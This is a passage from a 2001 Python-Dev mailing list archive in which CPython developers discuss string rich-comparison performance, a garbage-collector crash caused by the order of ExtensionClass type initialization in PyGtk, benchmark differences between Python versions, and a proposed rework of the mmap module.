Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions). I'd still be in favour of giving strings a richcompare, since it allows optimizing what I think is the single most frequent case: Py_EQ on strings.
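The last step Martin describes, turning a cmp()-style result in {-1, 0, 1} plus the requested operator into a true/false answer, is small enough to sketch. This is a Python model for illustration only: `convert_3way` and `richcmp_via_3way` are hypothetical names, operators are spelled as strings rather than `Py_LT`/`Py_EQ` constants, and the result is a Python `bool` rather than a C-level object. It makes the call structure visible: the non-rich path is one call to the 3-way compare followed by one conversion.

```python
import operator

# Each rich-comparison operator, applied to a 3-way result c against 0.
_OPS = {
    "<": operator.lt, "<=": operator.le, "==": operator.eq,
    "!=": operator.ne, ">": operator.gt, ">=": operator.ge,
}


def convert_3way(op: str, c: int) -> bool:
    """Map a cmp()-style result (negative, zero, positive) to a rich result."""
    return _OPS[op](c, 0)


def richcmp_via_3way(v, w, op, compare):
    """Non-rich path: one call to the 3-way compare, then the conversion."""
    return convert_3way(op, compare(v, w))


def cmp3(a, b):
    """A 3-way compare for ordinary Python values."""
    return (a > b) - (a < b)


print(richcmp_via_3way("ab", "cd", "<", cmp3))
```

Comparing `c` against zero, rather than against exactly -1 or 1, also accepts compare functions that return any negative or positive integer.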
With a control flow like

    if (a->ob_size != b->ob_size)
        goto False;
    if (a->ob_size == 0)
        goto True;
    if (a->ob_sval[0] != b->ob_sval[0])
        goto False;
    if (memcmp(a->ob_sval, b->ob_sval, a->ob_size))
        goto False;
    else
        goto True;

we can reduce the number of function calls.

Regards, Martin From skip@pobox.com (Skip Montanaro) Thu May 17 07:42:41 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com> Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem. When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
        PyObject_HEAD_INIT(NULL)
        0,                              /* ob_size */
        "GtkTreeSortable",              /* tp_name */
        sizeof(PyPureMixinObject),      /* tp_basicsize */
        ...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...)
A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values. In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector. The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem. Skip From martin@loewis.home.cs.tu-berlin.de Thu May 17 07:41:15 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> > 1. String objects are also equal despite being different objects, > if their ob_sinterned pointers are equal and non-NULL. So if > you're looking for every trick in & out of the book, that's > another one. That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers. > > So 5% of the calls are with identical strings, for which I can > > immediately decide the outcome. > > But also at the cost of doing a fruitless compare and branch in 95% > of calls. Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write

    if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of linear control flow. > Any idea where those 800,000 virgin calls to oldcomp are coming > from? That's a lot. As far as I could trace it, most of them come from lookdict_string (at various locations inside this function). > > #comps: 2949421 > > #memcmps: 917776 > > > > So still, ca. 30% can be decided by first byte.
> > Sorry, I couldn't follow this part, except noting that 917776 is about 30% of > 2949421, in which case I would have expected you to say that 70% can be > decided by first byte. Oops, you are right. > It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal@lemburg.com Thu May 17 07:54:37 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip@pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. 
Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. 
> The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@effbot.org Thu May 17 08:00:20 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... 
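The `gc.disable()`/`gc.enable()` workaround quoted above has two weak spots: if the import raises, the collector stays disabled, and it unconditionally re-enables collection even if the caller had switched it off. A context manager avoids both. This is a hedged sketch using only the standard `gc` and `contextlib` modules; `gc_paused` is a hypothetical helper name, and `json` stands in for the `gtk` module from the thread so the example runs anywhere. It only hides the crash; the underlying fix is still to set every `ob_type` before the module can be reached from Python.

```python
import gc
from contextlib import contextmanager


@contextmanager
def gc_paused():
    """Disable the cyclic collector for the body, then restore its prior state."""
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        yield
    finally:
        # Runs even if the body raises, so collection is never left off by accident.
        if was_enabled:
            gc.enable()


with gc_paused():
    import json  # stand-in for "import gtk" from the thread
```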
Cheers /F From skip@pobox.com (Skip Montanaro) Thu May 17 08:04:06 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. 
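Skip's suggestion, initializing base classes before their subclasses, amounts to a topological sort of the class hierarchy, which a code generator could compute with a depth-first walk like the one below. This is a sketch, not James's generator: `init_order` is a hypothetical helper, the input is assumed to be a mapping from class name to base-class names, and the hierarchy in the example is made up for illustration.

```python
def init_order(bases):
    """Return class names ordered so that every base precedes its subclasses.

    `bases` maps a class name to a list of its base-class names; names that
    only appear as bases are included too. Raises ValueError on a cycle.
    """
    VISITING, DONE = 1, 2
    state = {}
    order = []

    def visit(name):
        if state.get(name) == DONE:
            return
        if state.get(name) == VISITING:
            raise ValueError(f"cycle in class hierarchy at {name!r}")
        state[name] = VISITING
        for base in bases.get(name, ()):
            visit(base)          # emit every base before this class
        state[name] = DONE
        order.append(name)

    for name in bases:
        visit(name)
    return order


# Hypothetical hierarchy, listed subclass-first as a generator might emit it.
hierarchy = {
    "GtkButton": ["GtkWidget"],
    "GtkWidget": ["GtkObject"],
    "GtkObject": ["GObject"],
}
print(init_order(hierarchy))
```

Emitting the registration calls in this order means no bases tuple can refer to a type whose `ob_type` has not been set yet.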
Skip From skip@pobox.com (Skip Montanaro) Thu May 17 08:07:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal@lemburg.com Thu May 17 08:09:38 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip@pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. 
It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. The actual object whose > bases tuple is being traversed is (in all the crashes I encountered), > GdkDragContext. The ordering of the registration calls could perhaps be > reordered. Currently GdkDragContext is patched up before GtkWidget, its > base class. This code is generated by James Henstridge's wrapper code > generator, so perhaps he can maintain the necessary class hierarchy > relationships and insure that base classes are initialized before their > subclasses. Wouldn't it be easier to simply set the ob_type fields right at the start of the initGtk() function ? This is what I do for all my extensions and I've never seen any problems with it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james@daa.com.au Thu May 17 08:18:23 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:18:23 +0800 (WST) Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: On Thu, 17 May 2001 skip@pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... 
> }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) Well, for Extension Classes, PyType_Type is not correct either. And because ExtensionClass is loaded at runtime, we can't set the ob_type field in the initialiser even on Unix systems. > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. > > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. Thanks for debugging this problem Skip. If we don't find a correct solution to the problem, I can put the gc disable/enable calls inside the gtk/__init__.py module. James. From mal@lemburg.com Thu May 17 08:26:32 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:26:32 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B037D27.E258C363@lemburg.com> Tim Peters wrote: > > [MAL] > > Since it is possible that these figures result from my specific > > machine setup, I'd like to know what other people see on their > > machines. 
> > Is this the same machine where you were able to get 15% difference a few > years ago by adding or removing an unreachable printf in ceval.c (or was that > Vladimir)? If so, I bet it's degenerated to random 50% difference since then > . That must have been Vladimir's machine... even though I do admit that some small reordering changes do result in speedups of up to 10% -- probably due to the compiler accidentally creating code which the CPU's cache management likes. > My Win98SE box is *astonishingly* useless for timings. Without fail, the > first time I run pystone after a reboot yields a result a solid 50% higher > than the second or subsequent times I run it (yes, it's major-league *slower* > the second time). This is true across dozens of trials over several months, > and across all versions of Python. On Linux the situation is somewhat different; still I'm executing the tests 10 times each and for the figures I posted, I even ran pybench twice and only took the second readings as the basis. > And simple little loops routinely vary in reported runtime by a factor of 3. > I may have to dig my old Win95 box out of the packing crate <0.6 wink>. > > None of that changes, of course, that the numbers you got are scary. Sure are... but I'm not so much interested in the absolute numbers -- it's the hot-spots which showed up that scare me: e.g. dictionary creation seems to have suffered along the way for some reason, function calls are even slower now than they were previously and other important tasks such as instance creation take a similar hit (probably as a result of the other two). Running the same test for 2.1 vs. 2.0 there's not much to notice, so the important changes seem to be originating in the move from 1.5.2 to 2.0.
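The relative figures traded in this thread are easy to reproduce by hand. Pystone reports passes divided by elapsed seconds; the "diff" column below is read as the relative change against the reference run, positive meaning slower, which is an assumption about how pybench computes it. The sketch uses Jeremy's pystone times (0.85 s for 1.5.2, 0.94 s for CVS); the helper names are hypothetical.

```python
def pystones_per_second(seconds: float, passes: int = 10000) -> float:
    """Pystone rate: number of passes divided by elapsed time."""
    return passes / seconds


def percent_diff(new: float, old: float) -> float:
    """Relative change of `new` against `old`, in percent (positive = slower)."""
    return (new - old) / old * 100.0


old_t, new_t = 0.85, 0.94  # Jeremy's 1.5.2 and CVS times for 10000 passes
print(f"1.5.2: {pystones_per_second(old_t):.1f} pystones/s")
print(f"CVS:   {pystones_per_second(new_t):.1f} pystones/s")
print(f"CVS takes {percent_diff(new_t, old_t):.1f}% longer")
```

This reproduces the 11764.7 and 10638.3 pystones/second Jeremy reports, a slowdown of roughly 10.6% on that benchmark.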
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From james@daa.com.au Thu May 17 08:33:17 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 15:33:17 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: On Thu, 17 May 2001, Fredrik Lundh wrote: > footnote: this is usually done in the module init function, *before* > the call to Py_InitModule. see: The PyExtensionClass_Export() function requires a pointer to the module dictionary so that it can add itself to the module. Unfortunately this requires Py_InitModule to have been called beforehand. I guess this means that the current ExtensionClass API will need to be modified in order to allow ExtensionClasses to be initialised before Py_InitModule. > > http://www.python.org/doc/FAQ.html#3.24 > > if the garbage collector can run after Python calls a module's init- > function, but before that module calls back into Python, anything > can happen... James. From mwh@python.net Thu May 17 08:43:38 2001 From: mwh@python.net (Michael Hudson) Date: 17 May 2001 08:43:38 +0100 Subject: [Python-Dev] Performance compares In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200" References: <3B037D27.E258C363@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Sure are... but I'm not so much interested in the absolute numbers > -- it's the hot-spots which showed up that scare me: e.g. dictionary > creation seems to have suffered along the way for some reason, > function calls are even slower now than they were previously and > other important tasks such as instance creation take a similar hit > (probably as a result of the other two). Have you tried fiddling with gc parameters?
If the GC does a multi generation trawl through the heap in the middle of some test, that might skew the numbers in unexpected ways. Or not, of course. Cheers, M. -- CLiki pages can be edited by anybody at any time. Imagine the most fearsomely comprehensive legal disclaimer you have ever seen, and double it -- http://ww.telent.net/cliki/index From mal@lemburg.com Thu May 17 10:03:06 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 11:03:06 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> Message-ID: <3B0393CA.7B0E024C@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Sure are... but I'm not so much interested in the absolute numbers > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > creation seems to have suffered along the way for some reason, > > function calls are even slower now than they were previously and > > other important tasks such as instance creation take a similar hit > > (probably as a result of the other two). > > Have you tried fiddling with gc parameters? If the GC does a multi > generation trawl through the heap in the middle of some test, that > might skew the numbers in unexpected ways. > > Or not, of course. No, I haven't tried fiddling with those. I'm not sure I want to either ;-) ... the reason is that applications won't switch off GC for execution and so the test is closer to real life. Still, I'll rerun the test suite using gc.disable() and post the results. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Thu May 17 10:18:36 2001 From: mal@lemburg.com (M.-A.
Lemburg) Date: Thu, 17 May 2001 11:18:36 +0200 Subject: [Python-Dev] Performance compares References: <3B037D27.E258C363@lemburg.com> <3B0393CA.7B0E024C@lemburg.com> Message-ID: <3B03976C.CF47961@lemburg.com> "M.-A. Lemburg" wrote: > > Michael Hudson wrote: > > > > "M.-A. Lemburg" writes: > > > > > Sure are... but I'm not so much interested in the absolute numbers > > > -- it's the hot-spots which showed up that scare me: e.g. dictionary > > > creation seems to have suffered along the way for some reason, > > > function calls are even slower now than they were previously and > > > other important tasks such as instance creation take a similar hit > > > (probably as a result of the other two). > > > > Have you tried fiddling with gc parameters? If the GC does a multi > > generation trawl through the heap in the middle of some test, that > > might skew the numbers in unexpected ways. > > > > Or not, of course. > > No, I haven't tried fiddling with those. I'm not sure I want > to either ;-) ... the reason is that applications won't switch > off GC for execution and so the test is closer to real life. > > Still, I'll rerun the test suite using gc.disable() and post the > results. Turns out, the difference is not noticeable (< 1%). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gmcm@hypernet.com Thu May 17 14:00:27 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Thu, 17 May 2001 09:00:27 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B03932B.8219.CCBF9F3F@localhost> [Skip] > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > It would normally be the address of a type object (e.g. > &PyType_Type).
However, Jim Fulton pointed out that on Windows > you can't get the address of &PyType_Type object at compile time. This is MS being passive-aggressive. If you tell MSVC the source is C++, it will magically find the address of PyType_Type at compile time, but their language lawyers apparently believe the C spec disallows this. Standards conformant and incompatible - what-MS-calls-"win-win"-ly y'rs - Gordon From guido@digicool.com Thu May 17 15:04:59 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 09:04:59 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200." <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> References: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> > I'd still be in favour of giving strings a richcompare, since it > allows optimizing what I think is the single most frequent case: > Py_EQ on strings. I have always thought that eventually (but long before Py3K!) all objects would only support rich comparisons and the __cmp__ and tp_compare slots would become completely obsolete. I realize I probably haven't expressed this thought clearly, and I'm not going to push for this to happen quickly or forcefully, but it's nevertheless how I see things. I expect it would allow a tremendous cleanup of the comparison code. It will never reach the simplicity of cmp() -- but think of Einstein's (?) rule "things should be as simple as they can be, but no simpler." Clearly cmp() was too simple. :-) Anyway, it worries me whenever I hear someone express the thought that adding rich comparisons to a particular object type would be a bad idea because it would slow things down.
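Tim's objection earlier in this thread is that once a type has only rich comparisons, a cmp()-style answer has to be rebuilt from them, costing one to three calls depending on the data. The sketch below models that fallback, assuming the order ==, then <, then >; `cmp_via_rich` is a hypothetical name, and raising TypeError when no test succeeds is this sketch's own choice, not necessarily what the interpreter does.

```python
def cmp_via_rich(a, b, calls):
    """Derive a cmp()-style result from rich comparisons alone.

    Tries ==, then <, then >, appending each operator tried to `calls`.
    """
    attempts = (
        ("==", lambda: a == b, 0),
        ("<", lambda: a < b, -1),
        (">", lambda: a > b, 1),
    )
    for op, test, outcome in attempts:
        calls.append(op)
        if test():
            return outcome
    # Nothing matched (e.g. NaN): this sketch gives up rather than guess.
    raise TypeError("values are unordered")


for x, y in (("spam", "spam"), ("eggs", "spam"), ("spam", "eggs")):
    calls = []
    print(x, y, cmp_via_rich(x, y, calls), calls)
```

Equal values cost one rich comparison, smaller ones two and larger ones three, which is the data-dependent cost Tim describes for cmp(string1, string2).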
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Thu May 17 15:37:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:37:30 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT." <3B03932B.8219.CCBF9F3F@localhost> References: <3B03932B.8219.CCBF9F3F@localhost> Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com> > [Skip] > > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. > > It would normally be the address of a type object (e.g. > > &PyType_Type). However, Jim Fulton pointed out that on Windows > > you can't get the address of &PyType_Type object at compile time. > > This is MS being passive-aggressive. If you tell MSVC the > source is C++, it will magically find the address of > PyType_Type at compile time, but their language lawyers > apparently believe the C spec disallows this. Standards > conformant and incompatible - > > what-MS-calls-"win-win"-ly y'rs > > - Gordon I don't think MS blames it on the language spec so much; it's probably more that they use the spec as an excuse not to fix their implementation. The problem only occurs when the definition of the symbol is in a different DLL than the reference. This is why built-in types like PyTuple_Type don't have this problem. I guess for C++ they have to do a dynamic initializer anyway, so they can make this work, but they haven't bothered to make it work for C. My other point is that Skip's problem is clearly a gtk bug: it shouldn't have exposed the type before fully initializing it. 
--Guido van Rossum (home page: http://www.python.org/~guido/) From james@daa.com.au Thu May 17 15:48:43 2001 From: james@daa.com.au (James Henstridge) Date: Thu, 17 May 2001 22:48:43 +0800 (WST) Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com> Message-ID: On Thu, 17 May 2001, Guido van Rossum wrote: > My other point is that Skip's problem is clearly a gtk bug: it > shouldn't have exposed the type before fully initializing it. On further investigation, it turned out that it was caused by a bug in my code generator that caused one extension class to be initialised before its base class (in fact, that particular extension class shouldn't have had any base classes). It was just the cyclic GC code triggering the bug. It will be fixed in the next snapshot of pygtk for GTK+ 2.0 James. -- Email: james@daa.com.au WWW: http://www.daa.com.au/~james/ From guido@digicool.com Thu May 17 15:52:54 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 17 May 2001 10:52:54 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800." References: Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com> > On further investigation, it turned out that it was caused by a bug in my > code generator that caused one extension class to be initialised before > its base class (in fact, that particular extension class shouldn't have > had any base classes). It was just the cyclic GC code triggering the bug. > > It will be fixed in the next snapshot of pygtk for GTK+ 2.0 Excellent news, James! I love the open source process! --Guido van Rossum (home page: http://www.python.org/~guido/) From barry@digicool.com Thu May 17 16:04:50 2001 From: barry@digicool.com (Barry A. 
Warsaw) Date: Thu, 17 May 2001 11:04:50 -0400 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <200105171452.f4HEqse09691@odiug.digicool.com> Message-ID: <15107.59538.421007.37251@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Excellent news, James! I love the open source process! No kidding! http://perens.com/Articles/StandTogether.html :) From Barrett@stsci.edu Thu May 17 15:56:49 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Thu, 17 May 2001 10:56:49 -0400 Subject: [Python-Dev] mmap module Message-ID: <3B03E6B1.A19F6594@STScI.Edu> In the CVS log of the mmapmodule.c, Tim Peters says: "The code really needs to be rethought from scratch (not by me, though ...)." Well, I might be the person to do the rethinking, but I'd first like to know what Tim has in mind. I've been playing around with this module lately and tend to agree that some enhancements could be made, particularly to prevent "bus errors" and "segmentation faults". The ability to have offsets into a file that are not multiples of the system pagesize would also be nice. I'd be willing to submit a PEP on a new mmapmodule, once I know what others would like. -- Paul -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From tim.one@home.com Thu May 17 17:02:38 2001 From: tim.one@home.com (Tim Peters) Date: Thu, 17 May 2001 12:02:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. I realize I > probably haven't expressed this thought clearly, and I'm not going to > push for this to happen quickly or forcefully, but it's nevertheless > how I see things.
